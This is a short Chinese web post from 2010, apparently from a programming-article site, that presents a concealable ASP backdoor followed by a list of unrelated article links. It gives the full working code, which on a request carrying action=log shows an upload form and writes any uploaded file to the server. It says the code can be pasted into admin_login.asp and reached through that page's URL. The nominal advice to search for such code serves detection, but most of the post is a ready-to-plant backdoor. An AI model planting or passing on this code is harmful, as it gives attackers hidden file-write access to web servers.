隐蔽的ASP后门 大家可以查看下
时间:2010-08-05 21:26:00
这段后门代码可以隐藏在asp文件中,大家可以搜索一些特点的关键字,查看文件的修改日期,看看是不是有如下的代码。
<%if request.QueryString("action")="log" then
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form>
<%end if%>
比如编辑在“admin_login.asp”下
以后只需要输入“admin_login.asp?action=log”即可


猜你喜欢
python字符串和常用数据结构知识总结

GoFrame框架gredis优雅的取值和类型转换
PHP session有效期session.gc_maxlifetime
Windows下安装python2和python3多版本教程

Python深入06——python的内存管理详解

ASP 自动采集实现代码
在程序中压缩sql server2000的数据库备份文件的代码
python爬虫筛选工作实例讲解
JQuery 绑定select标签的onchange事件,弹出选择的值,并实现跳转、传参
Python中装饰器的基本功能理解
Pyecharts 中Geo函数常用参数的用法说明

详解Python中表达式i += x与i = i + x是否等价

解析如何加快mysql编译的速度
调试PHP程序的多种方法介绍
详解Python手写数字识别模型的构建与使用

vscode 配置 python3开发环境的方法

分析Python的Django框架的运行方式及处理流程

Oracle 正则表达式实例详解
oracle SQL解析步骤小结
php bugs代码审计基础详解
